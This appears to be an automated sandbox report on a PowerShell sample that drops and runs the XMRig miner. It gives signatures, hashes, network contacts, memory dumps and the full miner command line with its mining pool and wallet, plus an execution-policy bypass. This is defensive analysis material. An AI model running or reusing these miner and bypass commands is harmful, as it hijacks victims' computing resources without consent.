| PID 4632 wrote to memory of 1336 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4632 wrote to memory of 1336 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xi1xopvf.y25.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:38
Platform
win10v2004-20240226-en
Max time kernel
1797s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 636 wrote to memory of 540 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 636 wrote to memory of 540 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3704 --field-trial-handle=2252,i,16022092570067181109,3235558581947505669,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1392 --field-trial-handle=2252,i,16022092570067181109,3235558581947505669,262144 --variations-seed-version /prefetch:8
Network
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zdv4l4xg.rtr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral22
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:40
Platform
win10-20240404-en
Max time kernel
1790s
Max time network
1771s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1276 wrote to memory of 4584 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1276 wrote to memory of 4584 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
Files
memory/1276-2-0x00007FFE42B03000-0x00007FFE42B04000-memory.dmp
memory/1276-5-0x00000216C1950000-0x00000216C1972000-memory.dmp
memory/1276-6-0x00007FFE42B00000-0x00007FFE434EC000-memory.dmp
memory/1276-9-0x00007FFE42B00000-0x00007FFE434EC000-memory.dmp
memory/1276-10-0x00000216C1B00000-0x00000216C1B76000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qqohxltb.fum.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1276-25-0x00007FFE42B00000-0x00007FFE434EC000-memory.dmp
memory/1276-48-0x00000216C1C80000-0x00000216C1C92000-memory.dmp
memory/1276-61-0x00000216C1AE0000-0x00000216C1AEA000-memory.dmp
memory/1276-62-0x00007FFE42B03000-0x00007FFE42B04000-memory.dmp
memory/1276-63-0x00007FFE42B00000-0x00007FFE434EC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4584-92-0x0000027A575C0000-0x0000027A575E0000-memory.dmp
memory/1276-93-0x00007FFE42B00000-0x00007FFE434EC000-memory.dmp
memory/1276-95-0x00007FFE42B00000-0x00007FFE434EC000-memory.dmp
memory/4584-94-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-96-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-97-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-98-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-99-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-100-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-101-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-102-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-103-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-104-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-105-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-106-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-107-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-108-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-109-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-110-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-111-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-112-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-113-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-114-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-115-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-116-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-117-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-118-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-119-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-120-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-121-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-122-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-123-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-124-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-125-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-126-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-127-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-128-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-129-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-130-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-131-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-132-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-133-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-134-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-135-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-136-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-137-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-138-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-139-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-140-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-141-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-142-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-143-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-144-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-145-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-146-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-147-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-148-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-149-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-150-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-151-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-152-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-153-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-154-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-155-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-156-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
memory/4584-157-0x00007FF7E2040000-0x00007FF7E2C73000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:41
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1773s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 64 matches (no description, indicator, process or target recorded) | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3080 wrote to memory of 5100 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3080 wrote to memory of 5100 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
Files
memory/3080-1-0x00007FFA2E873000-0x00007FFA2E874000-memory.dmp
memory/3080-5-0x000001FAFA2C0000-0x000001FAFA2E2000-memory.dmp
memory/3080-8-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
memory/3080-9-0x000001FAFA470000-0x000001FAFA4E6000-memory.dmp
memory/3080-10-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zixbql3q.mdl.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3080-25-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
memory/3080-48-0x000001FAFA920000-0x000001FAFA932000-memory.dmp
memory/3080-61-0x000001FAFA450000-0x000001FAFA45A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/5100-90-0x000001EAAC240000-0x000001EAAC260000-memory.dmp
memory/5100-91-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-92-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/3080-93-0x00007FFA2E873000-0x00007FFA2E874000-memory.dmp
memory/3080-94-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
memory/3080-95-0x00007FFA2E870000-0x00007FFA2F25C000-memory.dmp
memory/5100-96-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-97-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-98-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-99-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-100-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-101-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-102-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-103-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-104-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-105-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-106-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-107-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-108-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-109-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-110-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-111-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-112-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-113-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-114-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-115-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-116-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-117-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-118-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-119-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-120-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-121-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-122-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-123-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-124-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-125-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-126-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-127-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-128-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-129-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-130-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-131-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-132-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-133-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-134-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-135-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-136-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-137-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-138-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-139-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-140-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-141-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-142-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-143-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-144-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-145-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-146-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-147-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-148-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-149-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-150-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-151-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-152-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-153-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-154-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-155-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
memory/5100-156-0x00007FF6BB020000-0x00007FF6BBC53000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:42
Platform
win10-20240404-en
Max time kernel
1792s
Max time network
1790s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 64 matches (no description, indicator, process or target recorded) | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
